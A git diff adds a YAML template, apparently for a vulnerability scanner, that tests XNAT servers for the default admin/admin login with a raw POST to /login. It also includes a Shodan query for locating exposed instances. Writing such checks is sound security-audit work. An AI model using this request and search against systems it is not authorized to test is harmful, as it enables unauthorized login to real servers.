diff --git a/default-logins/xnat-default-login.yaml b/default-logins/xnat-default-login.yaml new file mode 100644 index 0000000000..8c9a28b01e --- /dev/null +++ b/default-logins/xnat-default-login.yaml @@ -0,0 +1,42 @@ +id: xnat-default-login + +info: + name: XNAT Default Login + author: 0x_Akoko + severity: high + description: XNAT default login information (admin/admin) was discovered. + reference: + - https://wiki.xnat.org/documentation/xnat-administration/xnat-setup-first-time-configuration#:~:text=Log%20in%20with%20the%20username%20admin%20and%20password%20admin + metadata: + verified: true + shodan-query: http.title:"XNAT" + tags: default-login,xnat + +requests: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + login_method=localdb&username={{username}}&password={{password}}&login=&XNAT_CSRF= + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "app/template/Index.vm?login=true" + - "JSESSIONID" + condition: and + + - type: status + status: + - 302